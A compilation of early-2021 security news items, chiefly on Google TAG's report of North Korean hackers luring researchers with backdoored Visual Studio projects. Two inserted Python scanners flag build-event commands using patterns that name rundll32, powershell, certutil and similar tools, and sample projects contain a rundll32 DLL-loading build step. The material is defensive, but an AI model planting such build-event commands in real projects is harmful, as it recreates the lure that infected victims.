“Unfortunately, hackers are taking advantage of security gaps in the everywhere enterprise by increasingly targeting mobile devices and applications with sophisticated phishing attacks,” Ivanti said in its report. “And these mobile phishing attacks are likely to succeed, as it is very hard to verify the authenticity of links on a mobile device. The mobile user interface also makes it difficult to access and view key information, while prompting users to make fast decisions.”
While 93% of respondents said they already had solutions in place to enable remote work when the pandemic started, a vast majority also admitted that more security measures are needed. Nearly two-thirds said they plan on investing in mobile threat detection software, and 57% said they were enhancing authentication to remote applications.
The survey shows that CISOs in Europe had, on average in 2020, a total IT security budget of roughly €65 million ($78 million), with much of it (41%) spent on unified endpoint management (UEM) solutions. However, a majority expect their budgets to increase in 2021 and they plan on increasing investment in specialized UEM solutions.
Eighty percent of respondents also believe that passwords are no longer effective for protecting enterprise data, and 70% of CISOs said they plan on investing more in biometric authentication tech.
North Korea Targets Security Researchers in Elaborate 0-Day Campaign
27.1.2021 BigBrothers Threatpost
Hackers masquerade as security researchers to befriend analysts and eventually infect fully patched systems at multiple firms with a malicious backdoor.
Hackers linked to North Korea are targeting security researchers with an elaborate social-engineering campaign that sets up trusted relationships with them — and then infects their organizations’ systems with custom backdoor malware.
That’s according to Google’s Threat Analysis Group (TAG), which issued a warning late Monday about a campaign it has tracked over the last several months that uses various means to interact with and attack professionals working on vulnerability research and development at multiple organizations.
The effort includes attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves, according to a blog post by TAG’s Adam Weidermann. Hackers first establish communications with researchers in a way that looks like they are credibly working on similar projects, then they ask them to collaborate, and eventually infect victims’ machines.
The infections are propagated either through a malicious backdoor in a Visual Studio Project or via an infected website, he wrote. And moreover, those infected were running fully patched and up-to-date Windows 10 and Chrome browser versions — a signal that hackers likely are using zero-day vulnerabilities in the campaign, the researcher concluded.
TAG attributed the threat actors to “a government-backed entity based in North Korea.”
“They’ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits, and for amplifying and retweeting posts from other accounts that they control,” according to the post. “Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including ‘guest’ posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.”
In addition to Twitter, threat actors also used other platforms, including LinkedIn, Telegram, Discord, Keybase and email to communicate with potential targets, Weidermann said. So far it seems that only security researchers working on Windows machines have been targeted.
Making Connections
Attackers initiate contact by asking a researcher if he or she wants to collaborate on vulnerability research together. Threat actors appear to be credible researchers in their own right because they have already posted videos of exploits they’ve worked on, including faking the success of a working exploit for an existing and recently patched Windows Defender vulnerability, CVE-2021-1647, on YouTube.
The vulnerability received notoriety as one that has been exploited for the past three months and leveraged by hackers as part of the massive SolarWinds attack.
“In the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake,” Weidermann explained.
If an unsuspecting targeted researcher agrees to collaborate, attackers then provide the researcher with a Visual Studio Project infected with malicious code. Several targets took to Twitter to describe their experiences.
“Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events,” Weidermann wrote. “The DLL is custom malware that would immediately begin communicating with actor-controlled command-and-control (C2) domains.”
Victims also can be infected by following a Twitter link hosted on blog.br0vvnn[.]io to visit a threat actor’s blog, according to TAG. Accessing the link installs a malicious service on the researcher’s system that executes an in-memory backdoor that establishes a connection to an actor-owned C2 server, researchers discovered.
The TAG team has so far been unable to confirm the mechanism of compromise, and is asking the wider security community for help in identifying it and submitting information through the Chrome Vulnerability Reward Program.
Researchers also did not specifically say what the likely motive was for the attacks; however, presumably the threat actors aim to uncover and steal vulnerabilities to use in North Korean advanced persistent threat (APT) campaigns.
Weidermann’s post includes a list of known accounts being used in the campaign, and he advised researchers who may have communicated with any of the accounts or visited related sites to review their systems for compromise.
“We hope this post will remind those in the security research community that they are targets to government-backed attackers and should remain vigilant when engaging with individuals they have not previously interacted with,” Weidermann wrote.
North Korea-linked campaign targets security experts via social media
27.1.2021 BigBrothers Securityaffairs
Google TAG is warning that North Korea-linked hackers are targeting security researchers through social media.
Google Threat Analysis Group (TAG) is warning that North Korea-linked hackers are targeting security researchers through social media.
According to the Google team that focuses on nation-state attacks, a North Korea-linked APT group has targeted experts working on security vulnerability research.
“Over the past several months, the Threat Analysis Group has identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.” reads the TAG’s report. “The actors behind this campaign, which we attribute to a government-backed entity based in North Korea, have employed a number of means to target researchers”
The attackers targeted the researchers through multiple social networking platforms, including Twitter, LinkedIn, Telegram, Discord, and Keybase.
Threat actors used a network of fake profiles to get in contact with researchers of interest, in some cases the victims were also contacted via email.
In an attempt to get in contact with security researchers, the threat actors created a research blog and used a network of Twitter profiles to interact with potential targets. Attackers used Twitter profiles for sharing links to their blog, to share videos of their claimed exploits, and for amplifying and retweeting posts from other accounts under their control.
“The actors have been observed targeting specific security researchers by a novel social engineering method.” continues the post. “After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project.”
The Visual Studio project used by the attackers included the source code for exploiting the vulnerability along with an additional DLL that would be executed through Visual Studio Build Events, which is a backdoor.
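Both write-ups above describe the same delivery mechanism: a DLL that runs through Visual Studio Build Events when the researcher builds the shared project. Build events live in the project file as plain MSBuild XML, so a received `.vcxproj` can be inspected for them before it is ever opened in the IDE. The following is an added Python example, not Google’s tooling and not part of either article: the project file content is constructed, the `helper.dll` path is a placeholder, and the set of command patterns treated as suspicious is an assumption you would tune to your own environment.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, NamedTuple

# The MSBuild project namespace used by .vcxproj files.
MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"
EVENT_TAGS = ("PreBuildEvent", "PreLinkEvent", "PostBuildEvent")

# Assumed patterns: commands that load a DLL or spawn a script host from a build step.
SUSPICIOUS = re.compile(
    r"(rundll32|regsvr32|powershell|mshta|certutil|cmd(\.exe)?\s+/c|\.dll\b)",
    re.IGNORECASE,
)


class BuildCommand(NamedTuple):
    source: str        # "PostBuildEvent", "PreBuildEvent", ... or "Target:<name>"
    condition: str     # MSBuild Condition attribute on the enclosing group/target
    command: str
    suspicious: bool


def _q(tag: str) -> str:
    """Qualify a tag with the MSBuild namespace for ElementTree lookups."""
    return f"{{{MSBUILD_NS}}}{tag}"


def extract_build_commands(vcxproj_xml: str) -> List[BuildCommand]:
    """List every command a build of this project would execute, from build events
    in ItemDefinitionGroups and from <Exec> tasks in custom <Target>s."""
    root = ET.fromstring(vcxproj_xml)
    found: List[BuildCommand] = []
    for group in root.iter(_q("ItemDefinitionGroup")):
        cond = group.get("Condition", "")
        for tag in EVENT_TAGS:
            for event in group.iter(_q(tag)):
                cmd_el = event.find(_q("Command"))
                if cmd_el is not None and cmd_el.text and cmd_el.text.strip():
                    cmd = cmd_el.text.strip()
                    found.append(BuildCommand(tag, cond, cmd, bool(SUSPICIOUS.search(cmd))))
    for target in root.iter(_q("Target")):
        name = target.get("Name", "?")
        for ex in target.iter(_q("Exec")):
            cmd = (ex.get("Command") or "").strip()
            if cmd:
                found.append(BuildCommand(f"Target:{name}", target.get("Condition", ""),
                                          cmd, bool(SUSPICIOUS.search(cmd))))
    return found


def suspicious_commands(vcxproj_xml: str) -> List[BuildCommand]:
    return [c for c in extract_build_commands(vcxproj_xml) if c.suspicious]


# Constructed project file: one harmless echo, one post-build step that loads a DLL,
# and one custom target that copies the build output.
SAMPLE_VCXPROJ = """<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile><WarningLevel>Level3</WarningLevel></ClCompile>
    <PreBuildEvent><Command>echo building poc</Command></PreBuildEvent>
    <PostBuildEvent>
      <Command>rundll32.exe $(SolutionDir)helper.dll,Start</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="Stage" AfterTargets="Build">
    <Exec Command="xcopy /y $(TargetPath) $(OutDir)" />
  </Target>
</Project>
"""


if __name__ == "__main__":
    for c in extract_build_commands(SAMPLE_VCXPROJ):
        flag = "SUSPICIOUS" if c.suspicious else "ok"
        print(f"[{flag:10s}] {c.source:16s} {c.condition!r}: {c.command}")
```

The scan reports three commands and flags only the post-build `rundll32` step. Build events run with the developer’s privileges the moment the project is built, which is why a project received from an unfamiliar collaborator deserves this kind of static look, on a machine separate from the one used for actual research, before any build is started.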
Experts also reported that the threat actors used social engineering to lure the researchers into a watering hole attack: victims were compromised after visiting the threat actors’ blog. The attackers shared a link on Twitter to a post on blog.br0vvnn[.]io; the site was designed to deliver a malicious service onto the researcher’s system and inject a backdoor directly into the memory of the target system.
Google TAG experts noticed that this mechanism likely involved zero-day exploits because it was able to infect visitors running fully patched and up-to-date Windows 10 and Chrome browser versions.
“At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions. At this time we’re unable to confirm the mechanism of compromise, but we welcome any information others might have. Chrome vulnerabilities, including those being exploited in the wild (ITW), are eligible for reward payout under Chrome’s Vulnerability Reward Program.” continues the report. “We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process.”
Google TAG experts are calling on the cybersecurity community to share details about these recent attacks.
The Google TAG report includes a list of actor-controlled sites and accounts, and invites security researchers to review their online activities and contacts to discover whether they have interacted in any way with these threat actors.
Security researchers are advised to review their browsing histories and see if they interacted with the threat actors.
“If you have communicated with any of these accounts or visited the actors’ blog, we suggest you review your systems for the IOCs provided below. To date, we have only seen these actors targeting Windows systems as a part of this campaign.” concludes Google.
“If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.”
Outgoing FCC Chair Issues Final Security Salvo Against China
26.1.2021 BigBrothers Threatpost
Ajit Pai says Chinese telecom companies ‘biggest national security threat’ for regulators in exit interview.
Outgoing Federal Communications Chair Ajit Pai has issued a final warning about Chinese telcos at the end of a tenure spent cracking down on companies like Huawei, ZTE and China Telecom.
Pai, a former telecommunications industry lobbyist and in-house counsel for Verizon, told Reuters that managing security threats against U.S. networks from Chinese espionage will be the “biggest national security issue that regulators will face in the next four years.”
Pai has spent a significant amount of time and energy at the FCC trying to block Chinese telecommunications companies from selling their hardware into communications networks in America — including devices, switches and routers. Pai contends that these companies are controlled by the Chinese government and that their products are suspected of having backdoors and other loopholes built in to allow the Chinese to spy on Americans.
“The Chinese Communist Party has a very determined world view,” Pai told Reuters. “They want to dominate this space and exert their will — even beyond their own borders. That is a serious threat not just to internet freedom but to national security for us and for many of our allies.”
The Chinese government and these companies, for their part, have denied all allegations of backdoors and espionage associated with their equipment. Huawei and ZTE also remain top movers in the 5G network-building space worldwide.
Reacting to the Chinese 5G Threat
As the race to build out 5G networks continues, the security of the supply chain is getting closer examination.
“A backdoor to a lawful intercept interface could yield a treasure trove of information to a malicious actor — including the current location of a target, details including when and where a call was placed, and even the ability to eavesdrop or listen into a current call,” Russ Mohr, engineer and Apple evangelist at MobileIron, told Threatpost. “A backdoor is an extremely valuable resource to a bad actor, and it is likely that it would be much more valuable as an asset to collect data than as a mounting point for an attack — although it may provide an opportunity to inject ransomware into a 5G network targeting a mobile carrier.”
Huawei, for one, has vigorously denied the allegations. A senior Huawei official told the paper: “The use of the lawful interception interface is strictly regulated and can only be accessed by certified personnel of the network operators. No Huawei employee is allowed to access the network without an explicit approval from the network operator.”
Accessing the backdoors without carrier permission “is extremely implausible and would be discovered immediately,” the official added.
Huawei and other Chinese telecommunications companies have also been widely accused of stealing American technology and trade secrets and selling the competing products at a far cheaper price, which has led to the wide adoption of Chinese products to build out networks all over the world.
In response to all of the concerns, the Trump administration set out to send a strong message back to China with help from Pai.
In Dec. 2018, Huawei executive Meng Wanzhou was arrested at Vancouver International Airport on fraud charges from the U.S. Department of Justice. Meng is still in Canada, living under house arrest in very opulent surroundings, awaiting trial for allegedly doing business with Iran in violation of U.S. sanctions.
Meng has denied the allegations.
State-owned China Mobile was banned by the FCC from providing communications services in the U.S. in 2019. Further, Pai’s FCC designated ZTE and Huawei national security threats, forbade any U.S. provider from doing business with the Chinese companies and even got Congress to approve $1.9 billion for providers to rip out and replace existing Chinese telecom equipment on their networks.
The Department of Justice indicted Huawei in 2019 for stealing T-Mobile’s intellectual property. CNET also reported Huawei is suspected to be working with the Chinese government to help identify Uighur minorities, in violation of human rights. In June, the Trump administration designated Huawei as backed by the Chinese military.
On Jan. 18, just two days before leaving office, President Trump hit Huawei suppliers with additional restrictions.
Is the response overblown? Canada, Germany and the U.K., among others, are taking no such extreme steps. Yet India and other countries have followed suit in banning Chinese telecommunications gear from new networks.
“The general sentiment among security practitioners agrees with the core of what Ajit Pai noted,” Brandon Hoffman, CISO at Netenrich told Threatpost. “It is hard to ignore the concrete examples that have been found over the years of this very issue.”
5G: A Trade Chip?
That said, others have said the bans may have played into trade negotiations with China.
“The telecom industry is strategic to all of our economies, and I think it’s a major trade chip that’s being used,” Gordon Smith, CEO of Sagent telecom, told The Hill in the wake of the FCC’s 2019 sanctions against Chinese telecom companies. “And I think U.S. action now is to get action from China on other matters.”
It’s still unclear whether the new Biden administration and its new FCC Chair Jessica Rosenworcel will take the same hawkish stance with China, but she very publicly broke with Pai on Trump’s 2019 tariffs on Chinese goods, warning they would stall the rollout of 5G in the U.S.
“The administration’s trade war with China threatens to increase the costs of wireless infrastructure by hundreds of millions of dollars at a critical moment in the race to 5G,” Rosenworcel, then an FCC board member, said in a Politico op-ed. “Getting caught in a trade war that impacts so much 5G network deployment is foolhardy. It’s not the way to win. It sacrifices our leadership in technology.”
Dutch police arrested two people for the illegal sale of COVID-19 patient data
26.1.2021 BigBrothers Securityaffairs
Dutch police arrested two individuals for allegedly selling COVID-19 patient data stolen from the Dutch health ministry.
Dutch police have arrested two individuals in the country for selling COVID-19 patient data stolen from the national COVID-19.
The availability of COVID-19 patient data in the cybercrime underground was spotted by the RTL Nieuws reporter Daniel Verlaan.
Verlaan discovered ads for stolen Dutch citizen data advertised on multiple instant messaging apps, including Telegram, Snapchat, and Wickr.
Dutch police arrested the duo within 24 hours of the complaint.
“On Friday, January 22, the police and the Public Prosecution Service received reports from the GGD that personal data from GGD systems would be offered for sale on Telegram. The cybercrime team of the Central Netherlands police immediately started an investigation. This investigation soon led to two employees of the GGD call center. The police immediately tracked them down. The suspects were both in Amsterdam on Saturday evening, where they were arrested and taken to a cell. It concerns a 21-year-old man from Heiloo and a 23-year-old man from Alblasserdam. The men’s homes were searched; computers have been seized.” reads the press release published by the Dutch Police.
“Stealing and selling or reselling personal data is a serious crime. Police and Public Prosecution are on top of this. Two people were arrested in this case within 24 hours.”
According to the Dutch newspaper, millions of patient details were offered for sale, including address details, telephone, and BSN identifiers (Dutch social security number). Data appears to be from the two most important systems of the Dutch Municipal Health Service (GGD).
“On chat services such as Telegram, Snapchat and Wickr, private data from the GGD systems has been offered for sale by dozens of accounts and in various large chat groups for months. Some accounts offer to look up the details of a specific person. That costs between 30 and 50 euros and then you will receive the home and email address and telephone and citizen service number from someone.” reads the post published by RTL Nieuws.
“Other accounts offer large datasets containing the private data of many tens of thousands of Dutch people. Criminals charge thousands of euros for this because it is relatively unique that social security numbers are sold on such a large scale. A social security number is very sensitive and can be misused for identity fraud.”
The data was allegedly stolen from two government systems used by the GGD: CoronIT, which contains details about Dutch citizens who took a COVID-19 test, and HPzone Light, one of the GGD’s contact-tracing systems.
Data was offered for prices ranging from €30 to €50 per person.
Verlaan discovered that the two suspects had access to official Dutch government COVID-19 systems because they were working in GGD call centers.
Experts pointed out that the availability of the BSN number (Dutch social security number) could expose citizens to financial fraud and identity theft.
Google Warning: North Korean Gov Hackers Targeting Security Researchers
26.1.2021 BigBrothers Securityweek
Google late Monday raised the alarm about a “government-backed entity based in North Korea” targeting -- and hacking into -- computer systems belonging to security researchers.
Google’s Threat Analysis Group (TAG), a team that monitors global APT activity, said the ongoing campaign is aimed at security researchers working on vulnerability research and development at different companies and organizations.
The campaign, which is well organized across multiple online platforms, included drive-by browser compromises from booby-trapped websites.
“In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server,” Google’s Adam Weidemann explained.
“At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions,” Weidemann said, suggesting the possible use of zero-day exploits.
He said Google was unable to confirm the mechanism of compromise and asked the public to report Chrome vulnerabilities, including those being exploited in the wild (ITW), to the Chrome Vulnerability Reward Program: “We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process.”
Google said the actors behind this campaign, which it links to a government-backed entity based in North Korea, worked over time to build credibility and connect with security researchers.
The actors established a research blog and multiple Twitter profiles and used the Twitter accounts to post links to their blog, post videos of their claimed exploits and to amplify and retweet posts from other accounts that they control.
Google found that the lure blog contained write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
“While we are unable to verify the authenticity or the working status of all of the exploits that they have posted videos of, in at least one case, the actors have faked the success of their claimed working exploit,” Weidemann said, providing screenshots and proof of the operation.
From the Google TAG blog:
The actors have been observed targeting specific security researchers by a novel social engineering method. After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.
Weidemann said the actors have used accounts on Twitter, LinkedIn, Telegram, Discord, Keybase and e-mail, mostly on users running Microsoft’s Windows operating system.
“If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research,” Weidemann added.
Russian Hack of US Agencies Exposed Supply Chain Weaknesses
26.1.2021 BigBrothers Securityweek
The elite Russian hackers who gained access to computer systems of federal agencies last year didn’t bother trying to break one by one into the networks of each department.
Instead, they got inside by sneaking malicious code into a software update pushed out to thousands of government agencies and private companies.
It wasn’t surprising that hackers were able to exploit vulnerabilities in what’s known as the supply chain to launch a massive intelligence gathering operation. U.S. officials and cybersecurity experts have sounded the alarm for years about a problem that has caused havoc, including billions of dollars in financial losses, but has defied easy solutions from the government and private sector.
“We’re going to have to wrap our arms around the supply-chain threat and find the solution, not only for us here in America as the leading economy in the world, but for the planet,” William Evanina, who resigned last week as the U.S. government’s chief counterintelligence official, said in an interview. “We’re going to have to find a way to make sure that we in the future can have a zero-risk posture, and trust our suppliers.”
In general terms, a supply chain refers to the network of people and companies involved in the development of a particular product, not dissimilar to a home construction project that relies on a contractor and a web of subcontractors. The sheer number of steps in that process, from design to manufacture to distribution, and the different entities involved give a hacker looking to infiltrate businesses, agencies and infrastructure numerous points of entry.
This can mean no single company or executive bears sole responsibility for protecting an entire industry supply chain. And even if most vendors in the chain are secure, a single point of vulnerability can be all that foreign government hackers need. In practical terms, homeowners who construct a fortress-like mansion can nonetheless find themselves victimized by an alarm system that was compromised before it was installed.
The most recent case targeting federal agencies involved Russian government hackers who are believed to have sneaked malicious code into popular software that monitors computer networks of businesses and governments. That product is made by a Texas-based company called SolarWinds that has thousands of customers in the federal government and private sector.
That malware gave hackers remote access to the networks of multiple agencies. Among those known to have been affected are the departments of Commerce, Treasury and Justice.
For hackers, the business model of directly targeting a supply chain is sensible.
“If you want to breach 30 companies on Wall Street, why breach 30 companies on Wall Street (individually) when you can go to the server — the warehouse, the cloud — where all those companies hold their data? It’s just smarter, more effective, more efficient to do that,” Evanina said.
Though President Donald Trump showed little personal interest in cybersecurity, even firing the head of the Department of Homeland Security’s cybersecurity agency just weeks before the Russian hack was revealed, President Joe Biden has said he will make it a priority and will impose costs on adversaries who carry out attacks.
Supply chain protection will presumably be a key part of those efforts, and there is clearly work to be done. A Government Accountability Office report from December said a review of 23 agencies’ protocols for assessing and managing supply chain risks found that only a few had implemented each of seven “foundational practices” and 14 had implemented none.
U.S. officials say the responsibility can’t fall to the government alone and must involve coordination with private industry.
But the government has tried to take steps, including through executive orders and rules. A provision of the National Defense Authorization Act barred federal agencies from contracting with companies that use goods or services from five Chinese companies, including Huawei. The government’s formal counterintelligence strategy made reducing threats to the supply chain one of five core pillars.
Perhaps the best-known supply chain intrusion before SolarWinds is the NotPetya attack in which malicious code found to have been planted by Russian military hackers was unleashed through an automatic update of Ukrainian tax-preparation software, called MeDoc. That malware infected its customers, and the attack overall caused more than $10 billion in damage globally.
The Justice Department in September charged five Chinese hackers who it said had compromised software providers and then modified source code to allow for further hacks of the providers’ customers. In 2018, the department announced a similar case against two Chinese hackers accused of breaking into cloud service providers and injecting malicious software.
“Anyone surprised by SolarWinds hasn’t been paying attention,” said Rep. Jim Langevin, a Rhode Island Democrat and member of the Cyberspace Solarium Commission, a bipartisan group that issued a white paper calling for the protection of the supply chain through better intelligence and information sharing.
Part of the appeal of a supply chain attack is that it’s “low-hanging fruit,” said Brandon Valeriano, a cybersecurity expert at the Marine Corps University. A senior adviser to the solarium commission, he says it’s not really known just how dispersed the networks are and that flaws in the supply chain are not uncommon.
“The problem is we basically don’t know what we’re eating,” Valeriano said. “And sometimes it comes up later that we choke on something -- and often we choke on things.”
N. Korean Hackers Targeting Security Experts to Steal Undisclosed Research
26.1.2021 BigBrothers Thehackernews
Google on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development.
The internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust.
The goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice.
"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers," said TAG researcher Adam Weidemann.
In one instance, the actor used Twitter to share a YouTube video of what it claimed to be an exploit for a recently patched Windows Defender flaw (CVE-2021-1647), when in reality, the exploit turned out to be fake.
The North Korean hackers are also said to have used a "novel social engineering method" to hit security researchers: asking them if they would like to collaborate on vulnerability research and then providing the targeted individual with a Visual Studio Project.
This Visual Studio Project, besides containing the source code for exploiting the vulnerability, included a custom malware that establishes communication with a remote command-and-control (C2) server to execute arbitrary commands on the compromised system.
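Both TAG descriptions of the lure above (a Visual Studio project whose Build Events run a bundled DLL) call for the same defensive check. The scanner below is an added example, not Google TAG's or the page's code: it lists every PreBuildEvent, PreLinkEvent and PostBuildEvent command in a .vcxproj, flags commands that invoke a script host or DLL loader, and lists imported .props/.targets files that also need a look. The project XML, file names and export name are constructed.

```python
"""Audit a Visual Studio C++ project for build-event commands.

Added example (not Google TAG code). A .vcxproj is MSBuild XML; PreBuildEvent,
PreLinkEvent and PostBuildEvent elements carry shell commands that Visual
Studio runs on build, which is the mechanism TAG describes for launching a
DLL shipped with a "shared research" project. The project XML, file names and
export name below are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

EVENT_TAGS = {"PreBuildEvent", "PreLinkEvent", "PostBuildEvent"}

# Hosts and loaders a native C++ build has little reason to call; a match is a
# review trigger, not proof of malice (tune for your own build conventions).
SUSPICIOUS = re.compile(
    r"\b(rundll32|regsvr32|powershell|pwsh|mshta|wscript|cscript|certutil|bitsadmin)(\.exe)?\b",
    re.IGNORECASE,
)

# Constructed sample project: one benign copy step, one event that hands a
# DLL to rundll32 (placeholder file and export names).
SAMPLE_VCXPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Import Project="$(VCTargetsPath)\\Microsoft.Cpp.props" />
  <Import Project="..\\shared\\extra.targets" />
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <PostBuildEvent>
      <Command>copy "$(OutDir)$(TargetName).exe" "$(SolutionDir)bin\\"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <PreBuildEvent>
      <Command>rundll32.exe "$(ProjectDir)helper.dll",ExportedEntry</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
</Project>
"""


def _local(tag: str) -> str:
    """Strip the MSBuild namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def build_event_commands(vcxproj_xml: str) -> list[dict]:
    """Return every build-event command with its event type and condition."""
    root = ET.fromstring(vcxproj_xml)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        if _local(elem.tag) not in EVENT_TAGS:
            continue
        # The Condition may sit on the event itself or on an enclosing group.
        condition, node = "", elem
        while node is not None and not condition:
            condition = node.get("Condition", "")
            node = parent_of.get(node)
        for cmd in elem:
            if _local(cmd.tag) == "Command" and (cmd.text or "").strip():
                found.append({"event": _local(elem.tag),
                              "condition": condition,
                              "command": cmd.text.strip()})
    return found


def flag_suspicious(commands: list[dict]) -> list[dict]:
    """Keep only commands that invoke a script host or DLL loader."""
    return [c for c in commands if SUSPICIOUS.search(c["command"])]


def imported_files(vcxproj_xml: str) -> list[str]:
    """Imported .props/.targets files can carry build events too; list them
    (unexpanded) so the reviewer scans those files as well."""
    root = ET.fromstring(vcxproj_xml)
    return [e.get("Project", "") for e in root.iter() if _local(e.tag) == "Import"]


if __name__ == "__main__":
    for hit in flag_suspicious(build_event_commands(SAMPLE_VCXPROJ)):
        print(f"[{hit['event']}] {hit['condition']}: {hit['command']}")
    print("also scan:", imported_files(SAMPLE_VCXPROJ))
```

Running the project scanner before opening a received solution in Visual Studio matters because build events fire on the first build, before any source is read.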
What's more, TAG said it observed several cases where researchers were infected after visiting the research blog, following which a malicious service was installed on the machine, and an in-memory backdoor would begin beaconing to a C2 server.
With the victim systems running fully patched and up-to-date versions of Windows 10 and Chrome web browser, the exact mechanism of compromise remains unknown. But it's suspected that the threat actor likely leveraged zero-day vulnerabilities in Windows 10 and Chrome to deploy the malware.
"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research," Weidemann said.
FSB warns Russian businesses of cyber attacks as retaliation for SolarWinds hack
23.1.2021 BigBrothers Securityaffairs
Russian authorities are alerting Russian organizations to potential cyberattacks launched by the United States in response to the SolarWinds attack.
The Russian intelligence agency FSB has issued a security alert this week warning Russian organizations of potential cyberattacks launched by the United States in response to the SolarWinds supply chain attack.
The alert was issued after officials of the new Biden administration declared that attacks like the SolarWinds one could trigger a response from the U.S. government.
The Russian government always denied any involvement in the SolarWinds attack.
The Russian National Coordination Center for Computer Incidents (NKTSKI) published a security bulletin to warn Russian businesses of the imminent risk of cyber attacks as a retaliation for the SolarWinds attacks that US Government agencies attributed to Moscow.
The Russian National Coordination Center for Computer Incidents (NKTSKI) was created by the Federal Security Service (FSB) in order to prevent, detect and counter cyberattacks on critical infrastructure facilities as well as repair damage from such attacks.
The news of the bulletin was first reported by ZDNet that also shared the alert (Russian language) published by the Russian Government.
The alert also includes a set of recommendations to Russian businesses to prevent cyber attacks.
Biden Orders Intelligence Agencies to Assess SolarWinds Hack
23.1.2021 BigBrothers Securityweek
Just days into his leadership role, U.S. President Joe Biden has instructed U.S. intelligence agencies to provide him with a detailed assessment of the SolarWinds hack, which fueled a global cyber espionage campaign impacting many high-profile government agencies and businesses.
The U.S. government and others have said Russia is likely behind the highly sophisticated attack on SolarWinds.
“Even as we work with Russia to advance U.S. interests, so too we work to hold Russia to account for its reckless and adversarial actions,” White House Press Secretary Jen Psaki said in a press briefing Thursday. “And to this end, the President is also issuing a tasking to the intelligence community for its full assessment of the SolarWinds cyber breach, Russian interference in the 2020 election, its use of chemical weapons against opposition leader Alexei Navalny, and the alleged bounties on U.S. soldiers in Afghanistan.”
In December, Biden said the perpetrators of the massive cyberattack on the US government must face consequences.
"We can't let this go unanswered," Biden said at the time. "That means making clear, and publicly, who is responsible for the attack and taking meaningful steps to hold them in account."
"When I learn the extent of the damage and, in fact, who is formally responsible, they can be assured that we will respond, and probably respond in kind," he added. "There are many options which I will not discuss now."
Kaspersky recently found a link between the Sunburst malware and Kazuar, a piece of malware previously connected to a Russian cyberspy group known as Turla.
Symantec this week said the attackers leveraged a piece of malware named Raindrop for lateral movement and deploying additional payloads.
SQL Server Malware Tied to Iranian Software Firm, Researchers Allege
22.1.2021 BigBrothers Cryptocurrency Threatpost
Researchers have traced the origins of a campaign – infecting SQL servers to mine cryptocurrency – back to an Iranian software firm.
Researchers have made new discoveries surrounding the source of a previously-uncovered cryptomining operation that has targeted internet-facing database servers.
The campaign, dubbed MrbMiner, was discovered in September 2020 downloading and installing a cryptominer on thousands of SQL servers. Now, researchers with Sophos have tracked the origin of the campaign to what they claim is a small software development company based in Iran.
“The name of an Iran-based software company was hardcoded into the miner’s main configuration file,” said researchers with Sophos in a Thursday analysis. “This domain is connected to many other zip files also containing copies of the miner. These zip files have in turn been downloaded from other domains, one of which is mrbftp.xyz.”
Researchers said that their records don’t reveal exactly how the malware gained a foothold on the database servers. However, they pointed to techniques used by the MyKings SQL-attacking botnet or Lemon_Duck cryptocurrency botnet as a possibility. Both of these botnets prey on various unpatched vulnerabilities in systems, with some additional infection vector tricks up their sleeve (including remote desktop protocol password brute-forcing for Lemon Duck).
